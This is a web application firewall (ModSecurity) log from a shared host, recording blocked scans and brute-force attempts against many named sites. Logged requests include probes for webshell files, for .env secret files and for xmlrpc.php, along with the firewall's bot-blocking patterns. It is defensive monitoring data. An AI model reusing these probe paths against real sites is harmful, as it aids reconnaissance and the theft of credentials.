[Tue May 26 18:44:53.576738 2026] [security2:error] [pid 1025417:tid 1025593] [client 20.195.199.65:47293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWczVHbArxonFeMXvQSJgAAAC4"]
[Tue May 26 18:44:53.576844 2026] [security2:error] [pid 1025417:tid 1025593] [client 20.195.199.65:47293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWczVHbArxonFeMXvQSJgAAAC4"]
[Tue May 26 18:44:53.697070 2026] [security2:error] [pid 1025417:tid 1025513] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWczVHbArxonFeMXvQSMAAAbl8"]
[Tue May 26 18:44:53.697249 2026] [security2:error] [pid 1025417:tid 1025657] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWczVHbArxonFeMXvQSMAAAbl8"]
[Tue May 26 18:44:53.890960 2026] [security2:error] [pid 1025417:tid 1025518] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.bak"] [unique_id "ahWczVHbArxonFeMXvQSMQAAUmQ"]
[Tue May 26 18:44:54.901568 2026] [security2:error] [pid 1025417:tid 1025550] [client 20.195.199.65:65216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/half.php"] [unique_id "ahWczlHbArxonFeMXvQSUQAAAAM"]
[Tue May 26 18:44:54.901769 2026] [security2:error] [pid 1025417:tid 1025550] [client 20.195.199.65:65216] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/half.php"] [unique_id "ahWczlHbArxonFeMXvQSUQAAAAM"]
[Tue May 26 18:44:55.246678 2026] [security2:error] [pid 1025417:tid 1025606] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWczlHbArxonFeMXvQSTQAAADs"]
[Tue May 26 18:44:55.763657 2026] [security2:error] [pid 1025417:tid 1025526] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.config"] [unique_id "ahWcz1HbArxonFeMXvQSYgAANWw"]
[Tue May 26 18:44:55.944197 2026] [security2:error] [pid 1025417:tid 1025629] [client 20.195.199.65:59753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/2P.php"] [unique_id "ahWcz1HbArxonFeMXvQSZgAAAFI"]
[Tue May 26 18:44:55.944291 2026] [security2:error] [pid 1025417:tid 1025629] [client 20.195.199.65:59753] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/2P.php"] [unique_id "ahWcz1HbArxonFeMXvQSZgAAAFI"]
[Tue May 26 18:44:56.799754 2026] [security2:error] [pid 1025417:tid 1025576] [client 60.49.92.72:41562] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWc0FHbArxonFeMXvQSdAAAHWk"]
[Tue May 26 18:44:57.527317 2026] [security2:error] [pid 1025417:tid 1025671] [client 20.195.199.65:57273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/tires.php"] [unique_id "ahWc0VHbArxonFeMXvQSgQAAAHw"]
[Tue May 26 18:44:57.527406 2026] [security2:error] [pid 1025417:tid 1025671] [client 20.195.199.65:57273] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/tires.php"] [unique_id "ahWc0VHbArxonFeMXvQSgQAAAHw"]
[Tue May 26 18:44:57.727868 2026] [security2:error] [pid 1025417:tid 1025431] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.dev"] [unique_id "ahWc0VHbArxonFeMXvQSiwAAKQ0"]
[Tue May 26 18:44:58.117976 2026] [security2:error] [pid 1025417:tid 1025658] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc0VHbArxonFeMXvQSigAAAG8"]
[Tue May 26 18:44:58.945194 2026] [security2:error] [pid 1025417:tid 1025577] [client 127.0.0.1:49382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWc0lHbArxonFeMXvQSrAAAAB4"]
[Tue May 26 18:44:58.945256 2026] [security2:error] [pid 1025417:tid 1025641] [client 20.195.199.65:39762] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWc0lHbArxonFeMXvQSqwAAAF4"]
[Tue May 26 18:44:59.133283 2026] [security2:error] [pid 1025417:tid 1025626] [client 20.195.199.65:39762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/like.php"] [unique_id "ahWc01HbArxonFeMXvQSrQAAAE8"]
[Tue May 26 18:44:59.133414 2026] [security2:error] [pid 1025417:tid 1025626] [client 20.195.199.65:39762] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/like.php"] [unique_id "ahWc01HbArxonFeMXvQSrQAAAE8"]
[Tue May 26 18:44:59.709897 2026] [security2:error] [pid 1025417:tid 1025535] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.live"] [unique_id "ahWc01HbArxonFeMXvQSuAAAJ3U"]
[Tue May 26 18:44:59.800289 2026] [security2:error] [pid 1025417:tid 1025660] [client 107.170.66.128:54005] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWc01HbArxonFeMXvQSvAAAAHE"]
[Tue May 26 18:45:00.556464 2026] [security2:error] [pid 1025417:tid 1025625] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc1FHbArxonFeMXvQSxQAAAE4"]
[Tue May 26 18:45:00.763407 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:39778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/.well-known/about.php"] [unique_id "ahWc1FHbArxonFeMXvQSzAAAACw"]
[Tue May 26 18:45:00.763539 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:39778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/.well-known/about.php"] [unique_id "ahWc1FHbArxonFeMXvQSzAAAACw"]
[Tue May 26 18:45:02.352491 2026] [security2:error] [pid 1025417:tid 1025532] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.local"] [unique_id "ahWc1lHbArxonFeMXvQS9AAAcHI"]
[Tue May 26 18:45:02.756753 2026] [security2:error] [pid 1025417:tid 1025539] [remote 185.230.216.227:58434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.216.230.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc1lHbArxonFeMXvQS9QAAVXk"]
[Tue May 26 18:45:02.963920 2026] [security2:error] [pid 1025417:tid 1025611] [client 124.43.5.103:54932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWc1lHbArxonFeMXvQTDQAAAEA"]
[Tue May 26 18:45:02.964055 2026] [security2:error] [pid 1025417:tid 1025611] [client 124.43.5.103:54932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWc1lHbArxonFeMXvQTDQAAAEA"]
[Tue May 26 18:45:03.029123 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:65273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWc11HbArxonFeMXvQTEgAAACw"]
[Tue May 26 18:45:03.029313 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:65273] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWc11HbArxonFeMXvQTEgAAACw"]
[Tue May 26 18:45:03.161791 2026] [security2:error] [pid 1025417:tid 1025656] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc1lHbArxonFeMXvQTCQAAAG0"]
[Tue May 26 18:45:04.469551 2026] [security2:error] [pid 1025417:tid 1025426] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.old"] [unique_id "ahWc2FHbArxonFeMXvQTQgAAcgg"]
[Tue May 26 18:45:04.588140 2026] [security2:error] [pid 1025417:tid 1025616] [client 202.76.169.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc2FHbArxonFeMXvQTMwAAAEU"]
[Tue May 26 18:45:04.671310 2026] [security2:error] [pid 1025417:tid 1025633] [client 20.195.199.65:47257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/bob.php"] [unique_id "ahWc2FHbArxonFeMXvQTRgAAAFY"]
[Tue May 26 18:45:04.671462 2026] [security2:error] [pid 1025417:tid 1025633] [client 20.195.199.65:47257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/bob.php"] [unique_id "ahWc2FHbArxonFeMXvQTRgAAAFY"]
[Tue May 26 18:45:04.675168 2026] [security2:error] [pid 1025417:tid 1025428] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc2FHbArxonFeMXvQTPgAAfgo"]
[Tue May 26 18:45:04.675487 2026] [security2:error] [pid 1025417:tid 1025673] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc2FHbArxonFeMXvQTPgAAfgo"]
[Tue May 26 18:45:05.204669 2026] [security2:error] [pid 1025417:tid 1025592] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc2FHbArxonFeMXvQTTAAAAC0"]
[Tue May 26 18:45:06.228244 2026] [security2:error] [pid 1025417:tid 1025574] [client 114.119.130.91:65395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.shirdisaibabatemple.org"] [uri "/festivals"] [unique_id "ahWc2lHbArxonFeMXvQTdwAAABs"], referer: https://www.shirdisaibabatemple.org/festivals
[Tue May 26 18:45:06.352444 2026] [security2:error] [pid 1025417:tid 1025576] [client 34.57.10.96:56393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.10.57.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWc2lHbArxonFeMXvQTdgAAAB0"]
[Tue May 26 18:45:06.352634 2026] [security2:error] [pid 1025417:tid 1025576] [client 34.57.10.96:56393] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWc2lHbArxonFeMXvQTdgAAAB0"]
[Tue May 26 18:45:06.363934 2026] [security2:error] [pid 1025417:tid 1025437] [remote 5.39.1.255:63972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ecosol.plus"] [uri "/robots.txt"] [unique_id "ahWc2lHbArxonFeMXvQTeAAANhM"]
[Tue May 26 18:45:06.364132 2026] [security2:error] [pid 1025417:tid 1025601] [client 5.39.1.255:63972] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ecosol.plus"] [uri "/robots.txt"] [unique_id "ahWc2lHbArxonFeMXvQTeAAANhM"]
[Tue May 26 18:45:06.412143 2026] [security2:error] [pid 1025417:tid 1025550] [client 20.195.199.65:59723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/t3s.php"] [unique_id "ahWc2lHbArxonFeMXvQTeQAAAAM"]
[Tue May 26 18:45:06.412253 2026] [security2:error] [pid 1025417:tid 1025550] [client 20.195.199.65:59723] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/t3s.php"] [unique_id "ahWc2lHbArxonFeMXvQTeQAAAAM"]
[Tue May 26 18:45:06.421395 2026] [security2:error] [pid 1025417:tid 1025435] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.prod"] [unique_id "ahWc2lHbArxonFeMXvQTegAABBE"]
[Tue May 26 18:45:07.857563 2026] [security2:error] [pid 1025417:tid 1025445] [remote 167.114.139.89:28366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ecosol.plus"] [uri "/"] [unique_id "ahWc21HbArxonFeMXvQTowAAHxs"]
[Tue May 26 18:45:07.857788 2026] [security2:error] [pid 1025417:tid 1025578] [client 167.114.139.89:28366] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ecosol.plus"] [uri "/"] [unique_id "ahWc21HbArxonFeMXvQTowAAHxs"]
[Tue May 26 18:45:08.088358 2026] [security2:error] [pid 1025417:tid 1025667] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc21HbArxonFeMXvQTnwAAAHg"]
[Tue May 26 18:45:08.089324 2026] [security2:error] [pid 1025417:tid 1025600] [client 127.0.0.1:28836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWc3FHbArxonFeMXvQTrAAAADU"]
[Tue May 26 18:45:08.089338 2026] [security2:error] [pid 1025417:tid 1025649] [client 20.195.199.65:41255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-admin/css/"] [unique_id "ahWc3FHbArxonFeMXvQTqwAAAGY"]
[Tue May 26 18:45:08.198126 2026] [security2:error] [pid 1025417:tid 1025659] [client 85.208.96.207:48012] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWc3FHbArxonFeMXvQTsAAAAHA"]
[Tue May 26 18:45:08.198249 2026] [security2:error] [pid 1025417:tid 1025659] [client 85.208.96.207:48012] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWc3FHbArxonFeMXvQTsAAAAHA"]
[Tue May 26 18:45:08.282130 2026] [security2:error] [pid 1025417:tid 1025568] [client 127.0.0.1:28852] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWc3FHbArxonFeMXvQTuwAAABU"]
[Tue May 26 18:45:08.282401 2026] [security2:error] [pid 1025417:tid 1025668] [client 20.195.199.65:41255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/x/"] [unique_id "ahWc3FHbArxonFeMXvQTuQAAAHk"]
[Tue May 26 18:45:08.307330 2026] [security2:error] [pid 1025417:tid 1025448] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.production"] [unique_id "ahWc3FHbArxonFeMXvQTvwAAEx4"]
[Tue May 26 18:45:08.478414 2026] [security2:error] [pid 1025417:tid 1025551] [client 127.0.0.1:28866] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWc3FHbArxonFeMXvQTwQAAAAQ"]
[Tue May 26 18:45:08.478476 2026] [security2:error] [pid 1025417:tid 1025550] [client 20.195.199.65:41255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWc3FHbArxonFeMXvQTwAAAAAM"]
[Tue May 26 18:45:08.505829 2026] [security2:error] [pid 1025417:tid 1025613] [client 185.191.171.1:57022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/features/grid-systems/"] [unique_id "ahWc3FHbArxonFeMXvQTwgAAAEI"]
[Tue May 26 18:45:08.505945 2026] [security2:error] [pid 1025417:tid 1025613] [client 185.191.171.1:57022] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "anujtradingco.com"] [uri "/features/grid-systems/"] [unique_id "ahWc3FHbArxonFeMXvQTwgAAAEI"]
[Tue May 26 18:45:08.729833 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:41255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/uwu.php"] [unique_id "ahWc3FHbArxonFeMXvQTwwAAAHE"]
